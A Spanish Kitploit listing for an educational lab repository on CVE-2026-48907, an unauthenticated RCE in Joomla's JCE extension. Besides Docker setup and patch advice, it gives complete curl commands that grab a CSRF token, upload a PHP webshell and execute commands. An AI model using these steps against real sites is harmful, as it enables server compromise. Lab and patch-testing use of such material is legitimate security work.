Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-48907 — PoC para CVE-2026-48907 | Kitploit
Herramientas/GitHubGitHub/pssec-io/cve-2026-48907
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de PayloadsLabs y Práctica
GitHubpssec-io/cve-2026-48907

CVE-2026-48907

PoC para CVE-2026-48907

Ver Repositorio
15hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-48907 — Laboratorio de RCE no autenticado en Joomla JCE

PSsec Laboratorio educativo de investigación de seguridad para CVE-2026-48907.


Resumen

CVE-2026-48907 es una vulnerabilidad crítica (CVSS 10.0) de ejecución remota de código no autenticada en JCE (Joomla Content Editor), la extensión de editor más instalada para Joomla, que afecta a todas las versiones ≤ 2.9.99.4.

El endpoint profiles.import acepta cargas de archivos sin ninguna autenticación. Un atacante puede subir un archivo PHP malicioso disfrazado de perfil XML, que se escribe en el directorio tmp/ del servidor y se ejecuta directamente a través de HTTP — sin necesidad de credenciales.

DetalleValor
CVECVE-2026-48907
Puntuación CVSS10.0 Crítico
Versiones afectadasJCE ≤ 2.9.99.4
Versiones corregidasJCE ≥ 2.9.99.5
En la lista KEV de CISASí — 16 de junio de 2026
Explotado activamenteSí

Configuración del laboratorio

Requisitos previos

  • Docker + Docker Compose
  • Kali Linux (o cualquier host Linux)

1. Iniciar el entorno vulnerable

docker compose up -d

2. Completar el instalador de Joomla

Abre http://localhost:8080 en tu navegador y completa el asistente de configuración con estas credenciales:

CampoValor
Host de la base de datosdb
Nombre de la base de datosjoomla
Usuario de la base de datosjoomla
Contraseña de la base de datosjoomlapass

3. Instalar la extensión JCE vulnerable

wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip

Luego, en el Administrador de Joomla → Sistema → Extensiones → Instalar → sube el ZIP.


Explotación

4. Extraer el token CSRF y la cookie de sesión

URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
  | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
  | head -n1)

5. Subir una webshell PHP mediante la importación de perfil no autenticada

curl -i -s -b cookies.txt -c cookies.txt \
  -F "[email protected];type=application/xml" \
  -F "task=profiles.import" \
  -F "${TOKEN}=1" \
  "$URL/index.php?option=com_jce"

6. Verificar la ejecución remota de código

curl -i -s -b cookies.txt -c cookies.txt \
  "$URL/tmp/shell.xml.php?cmd=id"

Salida esperada: uid=33(www-data) gid=33(www-data)


Archivos

ArchivoDescripción
docker-compose.ymlLevanta un Joomla 5.3.1 vulnerable + MySQL 8.0
shell.xml.phpPayload mínimo de webshell PHP
instructions.txtNotas de explotación paso a paso

Mitigación

Actualiza JCE a la versión 2.9.99.5 o posterior de inmediato.

Aviso oficial del proveedor y parche gratuito para versiones antiguas de Joomla: Actualización de seguridad de JCE — joomlacontenteditor.net


Créditos

  • Referencia de herramientas de explotación: JoomlaSniper por ynsmroztas
  • Vulnerabilidad descubierta en explotación activa por Phil Taylor de mySites.guru
  • Inclusión en KEV de CISA: 16 de junio de 2026

Descargo de responsabilidad

Este repositorio está destinado estrictamente a fines educativos y de investigación de seguridad autorizada.

Las pruebas solo deben realizarse contra sistemas que sean de tu propiedad o para los que tengas permiso explícito por escrito. El uso no autorizado de este material contra sistemas que no te pertenecen es ilegal y poco ético. Los autores y Pansophical OU no aceptan ninguna responsabilidad por el mal uso de este contenido.

Este entorno de laboratorio es intencionalmente vulnerable. No lo expongas a internet ni a ninguna red no confiable.


Por PSsec

Descargar herramienta